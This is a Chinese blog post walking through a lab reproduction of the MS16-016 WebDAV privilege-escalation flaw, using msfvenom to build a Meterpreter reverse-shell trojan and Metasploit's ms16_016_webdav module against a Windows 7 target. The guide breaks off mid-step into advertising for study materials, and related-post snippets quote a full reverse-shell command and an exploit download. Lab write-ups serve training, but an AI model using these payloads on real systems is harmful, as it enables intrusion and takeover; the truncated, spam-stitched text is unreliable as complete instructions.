MS16_016 漏洞利用与安全加固_exploit windows local ms16_016_webdav

最新推荐文章于 2024-05-11 09:22:40 发布
最新推荐文章于 2024-05-11 09:22:40 发布
阅读量1k 收藏 27
点赞数 15
分类专栏: 2024年程序员学习 文章标签: 安全 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_78398209/article/details/137657977
版权

环境说明

  • 渗透机操作系统:kali-linux-2024.1-installer-amd64
  • 漏洞复现操作系:cn_windows_7_professional_with_sp1_x64_dvd_u_677031

1 MS16_016 简介

MS16_016 漏洞产生的原因是由于 Windows 中的 WebDAV(分布式创作和版本管理)未正确处理客户端发送的信息,攻击者可以运行经过特殊设计的应用程序,从而提升权限。

2 MS16_016 复现过程

在开始之前请关闭靶机的防火墙, 关于渗透机和靶机环境的搭建可自行Bing

靶机需 32位 Windows系统,一定是32位的操作系统,要不然不能成功实现,有知道原因的可以留言

步骤01、

打开网络拓补,单机 “启动”按钮,启动实现虚拟机,如图所示。
在这里插入图片描述

步骤02、

使用 ifconfigipconfig命令分别获取渗透机和靶机的IP的地址,使用ping 命令进行网络 连通性测试,确保网络可达。

渗透机的IP 地址为 192.168.254.134,如图所示。

渗透机的IP地址

在这里插入图片描述

靶机的IP地址为 192.168.254.131,如图所示。

靶机的IP地址

在这里插入图片描述

步骤03、

在 Kali 终端下 使用 msfvenom -p windows/meterpreter/reverse_tcp LHOST=渗透机IP LPORT=木马通信端口 -f 输出格式 > 文件名 命令 生成木马文件,如图所示。

-p 指定需要使用的 载荷(Payload)

在这里插入图片描述

命令执行结束,在 /home/kali 目录下创建文件 theRavensea.exe ,如图所示。

文件生成在我们当前终端所在的目录下

在这里插入图片描述

步骤04、

使用 msfconsole 命令启动Metasploit 渗透测试平台,如图所示。

启动 Metasploit

在这里插入图片描述

步骤05、

使用 use /exploit/multi/handler 命令调用监听模块,同时使用 set payload windows/meterpreter/reverse_tcp 命令,设置本地监听的地址 192.168.254.134,设置监听端口 8888,最后使用 show options 命令查看最终的配置,如图所示。

查看配置参数 (端口号要与生成木马的端口号一致)

在这里插入图片描述

使用 run 或者 exploit 开启监听模式

运行溢出模块

在这里插入图片描述

步骤06、

将步骤3 中创建的木马文件复制到靶机中。复制过程中如果木马文件被安全软件删除,恢复即可。再运行木马,运行结束后,渗透机将会获得一个 meterpreter 会话,如图所示。

在靶机中打开 木马程序运行

在这里插入图片描述

获得 session 会话

在这里插入图片描述

步骤07、

使用 shell 命令启动 Meterpreter 下 cmd 的 Shell 终端,如图所示。

获取操作系统的 Shell

在这里插入图片描述

使用 whoami 命令查看当前的系统权限,如图所示。

查看用户权限

在这里插入图片描述

步骤08、

使用 background 命令将会话置于后台,会话编号为 1,如图所示。

exit 退出 Shell 终端

在这里插入图片描述

步骤09、

使用 use exploit/windows/local/ms16_016_webdav 命令调用漏洞利用模块,同时使用 set SESSION 命令设置刚才获得权限的会话,使用 set LPORT 命令设置载荷模块的监听的本地端口,然后使用 run 或者 exploit 命令运行该模块,如图所示。

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新

如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
img

学习路线:

这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成黑客大神,这个方向越往后,需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容:
在这里插入图片描述

一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
img

就会越来越多以下是网络渗透需要学习的内容:
在这里插入图片描述

一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
[外链图片转存中…(img-VcURAlAY-1712850837924)]

ms16-016提权
qq_54713392的博客
05-08 1281
ms16-016提权 简介:靶机需32位windows系统 攻击机:kali IP地址为:192.168.32.132 目标机:windows32 IP地址:192.168.32.135 先ping两台主机看是否通 步骤: 1)生成木马,设置本地ip地址192.168.32.132和端口号4444 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.32.132 LPORT=4444 -f exe > /root/test.exe 2)
MS16-016漏洞复现
qq_45440239的博客
06-01 1989
复现MS16-016漏洞
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 1484
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
MS16-016 提权EXP
angaoux03775的博客
02-28 421
测试环境win732位未打任何补丁 1、使用netuser指令测试得到结果没有权限新建用户 2.查看系统用户 3、复制EXP到win7下使用命令打开添加新用户再查看用户列表 转载于:https://www.cnblogs.com/sevck/p/5225643.html...
[提权]MS16-016提权EXP
weixin_30621711的博客
01-12 1457
MS16-016提权EXP[K8]Tested On Win7 x86Usage: ms16-016_win7.exe "whoami"by K8拉登哥哥 20160216下载:http://pan.baidu.com/s/1c1r45c0 转载于:https://www.cnblogs.com/k8gege/p/10261356.html
MS16_016 漏洞利用安全加固_exploit windows local ms16_016_webdav(1)
2401_84281629的博客
05-02 637
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
msf内网提权
dreamthe的博客
11-22 2477
目录 1.利用木马文件拿到shell 2.利用ms_2018_8120提权 3.提高程序运行级别。 4.基于ms16_016提权 5.基于ms14_058提权 ​6.基于ms13_053提权 7.uac绕过 8.基于ms16_032提权 1.利用木马文件拿到shell 这里呢我们就不多说了,在上一篇文章里面我进行详细说明和演示。如果有不懂的朋友可以看上一篇的文章,上一篇文章:利用msfvenom生成木马文件反弹shell、meterpreter 简单系统命令_dreamthe的...
通过msf复现漏洞ms16-016
NatusVincere
03-20 177
攻击者可以利用特意构造的应用程序或网页来绕过这些权限控制,使得攻击者可以在系统内核态执行恶意代码,并且获取系统权限。通过利用这个漏洞,攻击者可以执行未经授权的代码,获取系统敏感信息,或者潜在地导致拒绝服务情况。修复这个漏洞需要微软对Windows内核和相关的权限验证机制进行修复,以确保系统能够正确地限制和验证用户模式内核模式之间的通信,从而防止类似的安全功能绕过问题。这个漏洞主要由两个方面组成:一是Windows内核对于用户模式内核模式的通信机制出现了缺陷,使得攻击者可以进行越权操作;
ms10-061打印后台程序服务远程代码执行漏洞 成功复现xp&win7
田一柠的博客
12-15 2115
漏洞介绍 Windows打印后台程序没有充分限制访问该服务的用户权限,攻击者可以通过提交特制的打印请求在windows系统目录(%SystemRoot%\system32)中创建文件。 攻击者可指定任意文件名,包括目录遍历,通过发送WritePrinter请求,攻击者可以完全控制创建文件的内容。 将文件写入到windows系统目录后,通过WMI来部署恶意程序,因为系统会自动运行%SYstemRoot%\System32\Wbem\MOF文件夹的mof文件、执行命令。 该漏洞首次被发现并应用于著名的S
2022年安装Windows7 x64 专业版系统更新提示错误代码80072EFE,解决办法【亲测有限】
AnsonNie的博客
11-19 2897
2022年安装Windows7 x64 专业版系统更新提示错误代码80072EFE。Windows7补丁升级检查。
MS08067,MS10061漏洞靶机环境搭建.docx
07-07
MS08067,MS10061漏洞靶机环境搭建过程,演示靶机的搭建过程,用于攻防演练,渗透小白可以看一下
Windows7集成SP1微软原版光盘镜像下载大全
杨玉庆的专栏
06-18 8297
声明:Windows 7 With SP1 即已集成Service Pack 1的Win7版本。微软于2011年5月12日重新发布了集成SP1的版本(注释①)。本帖电驴链接均来自http://msdn.itellyou.cn/,其他链接来自热心网友。光盘SHA1值均来自微软官方,下载后一定要验证,若发现校验值不符,切勿安装,并望及时向IT之家社区反馈! =============
Windows 7 with SP1简体中文专业版(微软MSDN原版)
艺术编程
06-09 4244
Windows 7 with SP1简体中文专业版(微软MSDN原版) 32位版本: ed2k://|file|cn_windows_7_professional_with_sp1_vl_build_x86_dvd_u_677939.iso|2502909952|935E5B4B754527BE3C238FA6ABDD9B86|/ 文件名 cn_windows_7_professional_with_sp1_vl_build_x86_dvd_u_677939.iso 发布日期 (UTC): 5/12/201
Win7原版|MSDN Windows7 SP1官方原版ISO镜像下载(全版本)
热门推荐
lizz2276的博客
12-29 15万+
很多朋友在网上找不到Win7官方原版安装镜像,这里小编整理了MSDN Windows7 SP1官方原版ISO镜像下载(全版本)包括Win7家庭版、Win7高级家庭版、Win7专业版、Win7旗舰版、Win7企业版。有需要的朋友记得收藏了。 PS:下载地址(以下下载地址请右击复制快捷方式到电驴或者迅雷下载):Windows 7 Ultimate with Service Pack 1简体中文旗舰版:Windows 7 Ultimate with Service Pack 1 (x86) - ..
【小记】Windows7各版本下载链接
最新发布
qq_57764123的博客
05-11 5116
文件名:cn_windows_7_professional_with_sp1_x64_dvd_u_677031.iso。文件名:cn_windows_7_home_premium_with_sp1_x64_dvd_u_676691.iso。文件名:cn_windows_7_enterprise_with_sp1_x64_dvd_u_677685.iso。文件名:cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso。
CVE-2016-0051(WebDaV)漏洞复现
yangbz123的博客
08-08 1905
MS16-016(WebDaV)漏洞复现 目标机:win7x64 192.168.235.142 攻击机:kali 192.168.235.137 1、 确定目标主机和攻击机能够ping通 2、 启动kaliLinux终端利用msfvenom生成后门 输入命令msfvenom -p(-p用来设置参数的) windows/meterpreter/reverse_tcp LHOST=192.168.235.137(LHOST用来设置本地主机ip) LPORT=2222(LPORT=2222用来设置本地监听端
某省HW中遇到的提权
hackzkaq的博客
01-27 170
更多黑客技能 公众号:暗网黑客 此文为2019年的,供参考学习。 某省 HW 中遇到的一个环境提权笔记 0x01 环境: OS: Windows Server 2012 R2 补丁情况: KB3139914 : MS16-032 KB3124280 : MS16-016 KB3134228 : MS16-014 KB3079904 : MS15-097 KB3077657 : MS15-077 KB3045171 : MS15-051 KB3000061 : MS14-058 KB2829361 : .
漫漫漏洞复现之旅---第一天(MS-08-067)
d1303850859的博客
02-29 583
MS08-067复现 漏洞原理简述:攻击者可以利用漏洞向网络中的电脑发出远程的特制RPC请求,无需身份验证便可在电脑中任意执行远程代码。 漏洞环境:至少为Windows 2000/XP/Server 2003/Vista/Server 2008 攻击者:kali 被入侵者:win2003 打开msfconsole 2. 查询漏洞命令:search 08-067 3. 调用漏洞 IP为空...
windows安全加固
07-27
回答: 在加固Windows安全方面,有一些常见的措施可以采取。首先,定期更新操作系统和应用程序的补丁,以修复已知的漏洞。此外,安装可靠的杀毒软件和防火墙,以提供实时的保护和阻止恶意软件的入侵。另外,强化用户账户的安全性,例如使用复杂的密码、启用双因素身份验证等。此外,限制用户权限,只给予必要的权限,以减少潜在的攻击面。还可以通过配置组策略来加强安全性,例如禁用交互式登录、配置Windows日志等。总之,加固Windows安全需要综合考虑软件、硬件漏洞的修复、安全软件的安装、用户账户的管理以及组策略的配置等方面。\[1\]\[2\]\[3\] #### 引用[.reference_title] - *1* [windows详解加固安全(超详细)](https://blog.csdn.net/yi152787/article/details/121353282)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [Windows安全加固简介](https://blog.csdn.net/edwardhyl/article/details/5682069)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [Windows系统加固指引](https://blog.csdn.net/weixin_43465752/article/details/126899155)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值